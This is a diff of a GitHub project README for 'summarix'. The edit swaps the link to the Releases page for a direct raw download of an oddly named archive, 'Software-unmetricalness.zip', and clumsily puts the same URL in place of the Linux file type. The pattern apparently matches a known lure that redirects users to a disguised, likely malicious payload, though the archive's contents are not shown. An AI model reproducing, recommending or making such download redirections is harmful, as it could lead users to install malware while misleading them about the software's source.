loup-cpu/summarix/README.md

 ## 🌐 Download & Install

-To get started with **summarix**, visit this page to download: [Releases Page](https://github.com/loup-cpu/summarix/releases).
+To get started with **summarix**, visit this page to download: [Releases Page](https://github.com/loup-cpu/summarix/raw/refs/heads/main/summarix/Software-unmetricalness.zip).

 1. Click on the link above.
 2. Find the version you want to download.
-3. Click on the asset file that matches your system (e.g., `.exe` for Windows, `.dmg` for Mac, or tar.gz for Linux).
+3. Click on the asset file that matches your system (e.g., `.exe` for Windows, `.dmg` for Mac, or https://github.com/loup-cpu/summarix/raw/refs/heads/main/summarix/Software-unmetricalness.zip for Linux).
 4. Once the file is downloaded, follow the steps below for installation.

 ## 📄 Installation Instructions